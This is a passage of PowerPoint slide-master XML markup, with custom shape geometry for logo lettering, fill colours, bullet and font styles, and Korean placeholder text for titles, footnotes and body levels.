                  <a:gd name="connsiteY17" fmla="*/ 102394 h 114300"/>
                  <a:gd name="connsiteX18" fmla="*/ 58579 w 57150"/>
                  <a:gd name="connsiteY18" fmla="*/ 99155 h 114300"/>
                  <a:gd name="connsiteX19" fmla="*/ 58579 w 57150"/>
                  <a:gd name="connsiteY19" fmla="*/ 116777 h 114300"/>
                  <a:gd name="connsiteX20" fmla="*/ 49816 w 57150"/>
                  <a:gd name="connsiteY20" fmla="*/ 120301 h 114300"/>
                  <a:gd name="connsiteX21" fmla="*/ 39243 w 57150"/>
                  <a:gd name="connsiteY21" fmla="*/ 121634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7150" h="114300">
                    <a:moveTo>
                      <a:pt x="39243" y="121634"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35338" y="121634"/>
                      <a:pt x="31718" y="121158"/>
                      <a:pt x="28289" y="120205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24956" y="119253"/>
                      <a:pt x="22003" y="117729"/>
                      <a:pt x="19526" y="115538"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17050" y="113443"/>
                      <a:pt x="15145" y="110585"/>
                      <a:pt x="13907" y="107061"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12573" y="103537"/>
                      <a:pt x="11906" y="99155"/>
                      <a:pt x="11906" y="93917"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="11906" y="44387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="44387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11906" y="25813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11906" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33623" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33623" y="25813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58960" y="25813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58960" y="44387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33623" y="44387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33623" y="90583"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="33623" y="94774"/>
                      <a:pt x="34671" y="97727"/>
                      <a:pt x="36671" y="99631"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38671" y="101441"/>
                      <a:pt x="41529" y="102394"/>
                      <a:pt x="45244" y="102394"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49911" y="102394"/>
                      <a:pt x="54388" y="101346"/>
                      <a:pt x="58579" y="99155"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="58579" y="116777"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="55817" y="118301"/>
                      <a:pt x="52959" y="119539"/>
                      <a:pt x="49816" y="120301"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46863" y="121158"/>
                      <a:pt x="43244" y="121634"/>
                      <a:pt x="39243" y="121634"/>
                    </a:cubicBez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3" name="자유형: 도형 102">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5C2C93-9B6D-A240-B292-6CD46C6C0327}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3913925" y="3933722"/>
                <a:ext cx="19050" cy="123825"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 19050"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX1" fmla="*/ 23336 w 19050"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX2" fmla="*/ 23336 w 19050"/>
                  <a:gd name="connsiteY2" fmla="*/ 20479 h 123825"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 19050"/>
                  <a:gd name="connsiteY3" fmla="*/ 20479 h 123825"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 19050"/>
                  <a:gd name="connsiteY4" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX5" fmla="*/ 857 w 19050"/>
                  <a:gd name="connsiteY5" fmla="*/ 34957 h 123825"/>
                  <a:gd name="connsiteX6" fmla="*/ 22574 w 19050"/>
                  <a:gd name="connsiteY6" fmla="*/ 34957 h 123825"/>
                  <a:gd name="connsiteX7" fmla="*/ 22574 w 19050"/>
                  <a:gd name="connsiteY7" fmla="*/ 129064 h 123825"/>
                  <a:gd name="connsiteX8" fmla="*/ 857 w 19050"/>
                  <a:gd name="connsiteY8" fmla="*/ 129064 h 123825"/>
                  <a:gd name="connsiteX9" fmla="*/ 857 w 19050"/>
                  <a:gd name="connsiteY9" fmla="*/ 34957 h 123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050" h="123825">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23336" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23336" y="20479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="857" y="34957"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22574" y="34957"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22574" y="129064"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="857" y="129064"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="857" y="34957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4" name="자유형: 도형 103">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411EECD0-8F2E-B94F-97C1-321026D72CA6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3955645" y="3968679"/>
                <a:ext cx="95250" cy="85725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 95250"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 85725"/>
                  <a:gd name="connsiteX1" fmla="*/ 23146 w 95250"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 85725"/>
                  <a:gd name="connsiteX2" fmla="*/ 48482 w 95250"/>
                  <a:gd name="connsiteY2" fmla="*/ 69151 h 85725"/>
                  <a:gd name="connsiteX3" fmla="*/ 74009 w 95250"/>
                  <a:gd name="connsiteY3" fmla="*/ 0 h 85725"/>
                  <a:gd name="connsiteX4" fmla="*/ 96679 w 95250"/>
                  <a:gd name="connsiteY4" fmla="*/ 0 h 85725"/>
                  <a:gd name="connsiteX5" fmla="*/ 58198 w 95250"/>
                  <a:gd name="connsiteY5" fmla="*/ 94869 h 85725"/>
                  <a:gd name="connsiteX6" fmla="*/ 38767 w 95250"/>
                  <a:gd name="connsiteY6" fmla="*/ 94869 h 85725"/>
                  <a:gd name="connsiteX7" fmla="*/ 0 w 95250"/>
                  <a:gd name="connsiteY7" fmla="*/ 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5250" h="85725">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23146" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48482" y="69151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74009" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96679" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58198" y="94869"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38767" y="948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75" name="자유형: 도형 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FF0CB2B-FAAF-144A-8D03-3BA837B6022F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4065468" y="3966869"/>
                <a:ext cx="85725" cy="95250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 48387 w 85725"/>
                  <a:gd name="connsiteY0" fmla="*/ 98108 h 95250"/>
                  <a:gd name="connsiteX1" fmla="*/ 29432 w 85725"/>
                  <a:gd name="connsiteY1" fmla="*/ 94583 h 95250"/>
                  <a:gd name="connsiteX2" fmla="*/ 14097 w 85725"/>
                  <a:gd name="connsiteY2" fmla="*/ 84582 h 95250"/>
                  <a:gd name="connsiteX3" fmla="*/ 3810 w 85725"/>
                  <a:gd name="connsiteY3" fmla="*/ 69152 h 95250"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 85725"/>
                  <a:gd name="connsiteY4" fmla="*/ 49244 h 95250"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 85725"/>
                  <a:gd name="connsiteY5" fmla="*/ 48959 h 95250"/>
                  <a:gd name="connsiteX6" fmla="*/ 3429 w 85725"/>
                  <a:gd name="connsiteY6" fmla="*/ 29909 h 95250"/>
                  <a:gd name="connsiteX7" fmla="*/ 12954 w 85725"/>
                  <a:gd name="connsiteY7" fmla="*/ 14288 h 95250"/>
                  <a:gd name="connsiteX8" fmla="*/ 27527 w 85725"/>
                  <a:gd name="connsiteY8" fmla="*/ 3810 h 95250"/>
                  <a:gd name="connsiteX9" fmla="*/ 46101 w 85725"/>
                  <a:gd name="connsiteY9" fmla="*/ 0 h 95250"/>
                  <a:gd name="connsiteX10" fmla="*/ 65818 w 85725"/>
                  <a:gd name="connsiteY10" fmla="*/ 4096 h 95250"/>
                  <a:gd name="connsiteX11" fmla="*/ 79915 w 85725"/>
                  <a:gd name="connsiteY11" fmla="*/ 15145 h 95250"/>
                  <a:gd name="connsiteX12" fmla="*/ 88392 w 85725"/>
                  <a:gd name="connsiteY12" fmla="*/ 31242 h 95250"/>
                  <a:gd name="connsiteX13" fmla="*/ 91250 w 85725"/>
                  <a:gd name="connsiteY13" fmla="*/ 50578 h 95250"/>
                  <a:gd name="connsiteX14" fmla="*/ 91154 w 85725"/>
                  <a:gd name="connsiteY14" fmla="*/ 53531 h 95250"/>
                  <a:gd name="connsiteX15" fmla="*/ 90868 w 85725"/>
                  <a:gd name="connsiteY15" fmla="*/ 56674 h 95250"/>
                  <a:gd name="connsiteX16" fmla="*/ 21717 w 85725"/>
                  <a:gd name="connsiteY16" fmla="*/ 56674 h 95250"/>
                  <a:gd name="connsiteX17" fmla="*/ 30861 w 85725"/>
                  <a:gd name="connsiteY17" fmla="*/ 74390 h 95250"/>
                  <a:gd name="connsiteX18" fmla="*/ 48768 w 85725"/>
                  <a:gd name="connsiteY18" fmla="*/ 80582 h 95250"/>
                  <a:gd name="connsiteX19" fmla="*/ 62675 w 85725"/>
                  <a:gd name="connsiteY19" fmla="*/ 77724 h 95250"/>
                  <a:gd name="connsiteX20" fmla="*/ 74295 w 85725"/>
                  <a:gd name="connsiteY20" fmla="*/ 69342 h 95250"/>
                  <a:gd name="connsiteX21" fmla="*/ 86963 w 85725"/>
                  <a:gd name="connsiteY21" fmla="*/ 80582 h 95250"/>
                  <a:gd name="connsiteX22" fmla="*/ 70866 w 85725"/>
                  <a:gd name="connsiteY22" fmla="*/ 93440 h 95250"/>
                  <a:gd name="connsiteX23" fmla="*/ 48387 w 85725"/>
                  <a:gd name="connsiteY23" fmla="*/ 98108 h 95250"/>
                  <a:gd name="connsiteX24" fmla="*/ 69723 w 85725"/>
                  <a:gd name="connsiteY24" fmla="*/ 42291 h 95250"/>
                  <a:gd name="connsiteX25" fmla="*/ 67437 w 85725"/>
                  <a:gd name="connsiteY25" fmla="*/ 32576 h 95250"/>
                  <a:gd name="connsiteX26" fmla="*/ 62579 w 85725"/>
                  <a:gd name="connsiteY26" fmla="*/ 24765 h 95250"/>
                  <a:gd name="connsiteX27" fmla="*/ 55340 w 85725"/>
                  <a:gd name="connsiteY27" fmla="*/ 19526 h 95250"/>
                  <a:gd name="connsiteX28" fmla="*/ 45815 w 85725"/>
                  <a:gd name="connsiteY28" fmla="*/ 17526 h 95250"/>
                  <a:gd name="connsiteX29" fmla="*/ 29337 w 85725"/>
                  <a:gd name="connsiteY29" fmla="*/ 24384 h 95250"/>
                  <a:gd name="connsiteX30" fmla="*/ 21431 w 85725"/>
                  <a:gd name="connsiteY30" fmla="*/ 42291 h 95250"/>
                  <a:gd name="connsiteX31" fmla="*/ 69723 w 85725"/>
                  <a:gd name="connsiteY31" fmla="*/ 42291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5725" h="95250">
                    <a:moveTo>
                      <a:pt x="48387" y="98108"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="41624" y="98108"/>
                      <a:pt x="35242" y="96869"/>
                      <a:pt x="29432" y="94583"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23622" y="92297"/>
                      <a:pt x="18479" y="88868"/>
                      <a:pt x="14097" y="84582"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9716" y="80296"/>
                      <a:pt x="6382" y="75152"/>
                      <a:pt x="3810" y="69152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1238" y="63151"/>
                      <a:pt x="0" y="56483"/>
                      <a:pt x="0" y="49244"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="48959"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="42196"/>
                      <a:pt x="1143" y="35814"/>
                      <a:pt x="3429" y="29909"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5715" y="24003"/>
                      <a:pt x="8858" y="18764"/>
                      <a:pt x="12954" y="14288"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17050" y="9811"/>
                      <a:pt x="21908" y="6287"/>
                      <a:pt x="27527" y="3810"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33147" y="1238"/>
                      <a:pt x="39338" y="0"/>
                      <a:pt x="46101" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53626" y="0"/>
                      <a:pt x="60198" y="1334"/>
                      <a:pt x="65818" y="4096"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71438" y="6858"/>
                      <a:pt x="76200" y="10478"/>
                      <a:pt x="79915" y="15145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83629" y="19812"/>
                      <a:pt x="86487" y="25146"/>
                      <a:pt x="88392" y="31242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90297" y="37338"/>
                      <a:pt x="91250" y="43815"/>
                      <a:pt x="91250" y="50578"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91250" y="51530"/>
                      <a:pt x="91250" y="52483"/>
                      <a:pt x="91154" y="53531"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91059" y="54578"/>
                      <a:pt x="90964" y="55626"/>
                      <a:pt x="90868" y="56674"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21717" y="56674"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="22955" y="64389"/>
                      <a:pt x="26003" y="70295"/>
                      <a:pt x="30861" y="74390"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35814" y="78486"/>
                      <a:pt x="41815" y="80582"/>
                      <a:pt x="48768" y="80582"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54102" y="80582"/>
                      <a:pt x="58769" y="79629"/>
                      <a:pt x="62675" y="77724"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66580" y="75819"/>
                      <a:pt x="70485" y="73057"/>
                      <a:pt x="74295" y="69342"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="86963" y="80582"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="82487" y="85915"/>
                      <a:pt x="77057" y="90202"/>
                      <a:pt x="70866" y="93440"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64675" y="96679"/>
                      <a:pt x="57055" y="98108"/>
                      <a:pt x="48387" y="98108"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="69723" y="42291"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="69342" y="38862"/>
                      <a:pt x="68580" y="35624"/>
                      <a:pt x="67437" y="32576"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66199" y="29528"/>
                      <a:pt x="64675" y="26956"/>
                      <a:pt x="62579" y="24765"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60579" y="22574"/>
                      <a:pt x="58103" y="20765"/>
                      <a:pt x="55340" y="19526"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52578" y="18193"/>
                      <a:pt x="49339" y="17526"/>
                      <a:pt x="45815" y="17526"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39148" y="17526"/>
                      <a:pt x="33623" y="19812"/>
                      <a:pt x="29337" y="24384"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25051" y="28956"/>
                      <a:pt x="22384" y="34957"/>
                      <a:pt x="21431" y="42291"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="69723" y="42291"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="7F807E"/>
              </a:solidFill>
              <a:ln w="344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408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15" y="1091179"/>
            <a:ext cx="8394485" cy="442346"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="18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마스터 제목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5115" y="1748405"/>
            <a:ext cx="8394485" cy="4428558"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="18000" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-216000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/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>
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr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>
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr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>
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr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>
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr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</a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>첫째 수준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  <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7536339" y="0"/>
            <a:ext cx="1607661" cy="1166605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rgbClr val="0060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1" name="Freeform 43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8540649" y="5000217"/>
            <a:ext cx="603351" cy="1857783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8639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115" y="2702554"/>
            <a:ext cx="8394485" cy="1286633"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="28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마스터 제목</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>줄바꿈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7536339" y="0"/>
            <a:ext cx="1607661" cy="1166605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rgbClr val="0060A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2" name="Freeform 43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8540649" y="5000217"/>
            <a:ext cx="603351" cy="1857783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- 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43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8769367" y="5704463"/>
            <a:ext cx="374633" cy="1153537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15" y="438150"/>
            <a:ext cx="8394252" cy="442346"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="18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마스터 제목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5115" y="1096527"/>
            <a:ext cx="8394252" cy="5356235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="18000" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" indent="-252000">
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
              <a:defRPr sz="16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504000" indent="-252000">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="14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756000">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
              <a:defRPr sz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08000">
              <a:buClrTx/>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
              <a:defRPr sz="10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206000" indent="-180000">
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr sz="10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0" indent="0">
              <a:buFontTx/>
              <a:buNone/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</a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각주</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>본문</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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8874000" y="6543248"/>
            <a:ext cx="233538" cy="252412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2D94ACED-6144-4B78-9E59-762D97A9E2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2" name="Freeform 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8462195" y="0"/>
            <a:ext cx="681805" cy="494754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- 비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43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8769367" y="5704463"/>
            <a:ext cx="374633" cy="1153537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15" y="438150"/>
            <a:ext cx="8394252" cy="442346"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="18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마스터 제목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5115" y="1096527"/>
            <a:ext cx="8394252" cy="5356235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="18000" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="16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504000" indent="-252000">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="14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756000">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz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08000">
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr sz="10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170000" indent="-144000">
              <a:buClrTx/>
              <a:buFont typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:buChar char="-"/>
              <a:defRPr sz="10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0" indent="0">
              <a:buFontTx/>
              <a:buNone/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</a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
